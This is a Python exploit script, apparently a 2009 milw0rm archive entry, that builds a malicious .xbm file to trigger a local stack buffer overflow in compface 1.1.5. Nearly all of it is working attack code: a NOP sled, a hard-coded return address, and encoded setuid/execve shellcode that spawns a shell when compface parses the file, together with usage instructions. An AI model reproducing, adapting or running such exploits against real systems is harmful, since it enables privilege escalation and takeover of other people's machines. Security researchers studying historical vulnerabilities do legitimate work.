1 #!/usr/bin/python
2 #[*] Exploit :
Compface ’.xbm’ Local Buffer Overflow Exploit
3 #[*] Affected
:
compface 1.1.5
4 #[*] Tested on :
Ubuntu 9.04 (without stack randomization)
5 #[*] Refer
:
bid/35863
6 #[*] Exploit :
His0k4
7
8 #[*] Use : $compface exploit.xbm out
9
10 #setuid/execve shellcode for Linux/x86 by Marco Ivaldi
11 #[*] x86/alpha_mixed succeeded with size 124 (iteration=1)
12 shellcode=(
13 "\x89\xe1\xdb\xd1\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49"
14 "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
15 "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
16 "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
17 "\x42\x4a\x42\x37\x50\x58\x50\x31\x49\x4b\x48\x4d\x4d\x50\x42"
18 "\x4a\x44\x4b\x50\x58\x4d\x49\x51\x42\x42\x48\x46\x4f\x46\x4f"
19 "\x44\x33\x45\x38\x42\x48\x46\x4f\x42\x42\x42\x49\x42\x4e\x4b"
20 "\x39\x4d\x33\x51\x42\x50\x53\x4c\x49\x4b\x51\x48\x4d\x4d\x50"
21 "\x45\x5a\x41\x41")
22
23 payload = "#define noname_width 48\r\n"
24 payload += "#define noname_height 48\r\n"
25 payload += "static\r\n"
26 payload += "\x90"*180
27 payload += "\x80\xf4\xff\xbf" #$esp+10h
28 payload += "\x90"*16
29 payload += shellcode
30 payload += "\r\n"
31 payload += "char = {\r\n"
32
33 try:
34 out_file = open("exploit.xbm","w")
35 out_file.write(payload)
36 out_file.close()
37 print("\nExploit file created!\n")
38 except:
39 print "Error"
40
41 # milw0rm.com [2009−07−30]
Page 1/1
Compface 1.1.5 .xbm File Local Buffer Overflow Exploit
His0k4
07/30/2009